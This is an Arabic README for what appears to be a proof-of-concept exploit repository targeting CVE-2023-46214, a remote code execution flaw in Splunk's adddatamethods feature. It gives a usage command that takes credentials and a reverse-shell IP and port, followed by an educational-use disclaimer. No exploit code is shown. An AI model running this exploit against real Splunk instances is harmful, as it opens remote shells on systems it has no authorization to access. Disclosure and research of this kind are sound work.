
نموذج PoC مبني بلغة Python لثغرة CVE-2023-46214 يستغل ميزة adddatamethods في Splunk لتحقيق تنفيذ تعليمات برمجية عن بُعد عبر صدفة عكسية.
استغلال إثبات المفهوم لـ CVE-2023-46214، SVD-2023-1104

عنوان URL لمثيل Splunk واسم المستخدم وكلمة المرور وعنوان IP للقشرة العكسية والمنفذ كلها مطلوبة كمعاملات لسطر الأوامر. على سبيل المثال:
$ python3 CVE-2023-46214.py --url <Splunk_URL> --username <Username> --password <Password> --ip <Reverse_Shell_IP> --port <Reverse_Shell_Port>
لقد كتبت تدوينة تفصّل المنهجية المتبعة لاكتشاف هذه الثغرة. إذا كنت تواجه أي مشاكل مع السكربت، فقد تكون التدوينة مفيدة لأنها توضح الخطوات اليدوية للاستغلال.
سكربت إثبات المفهوم (PoC) المقدم في هذا المستودع يخدم أغراضًا تعليمية وبحثية فقط. الغرض منه هو عرض ثغرة محددة والمساعدة في فهم المخاطر الأمنية المرتبطة بها.
أي استخدام لهذا السكربت في أنشطة غير مصرح بها، بما في ذلك على سبيل المثال لا الحصر الوصول غير المصرح به إلى الأنظمة، أو الاختبار غير المصرح به، أو أي أشكال أخرى من سوء الاستخدام، ممنوع منعًا باتًا.
يتنصل منشئو ومساهمو هذا المستودع من أي مسؤولية عن الاستخدام غير السليم أو أي ضرر أو أذى ناتج عن استخدام هذا السكربت. باستخدامك لهذا السكربت، فأنت توافق على استخدامه بطريقة مسؤولة وعلى مسؤوليتك الخاصة.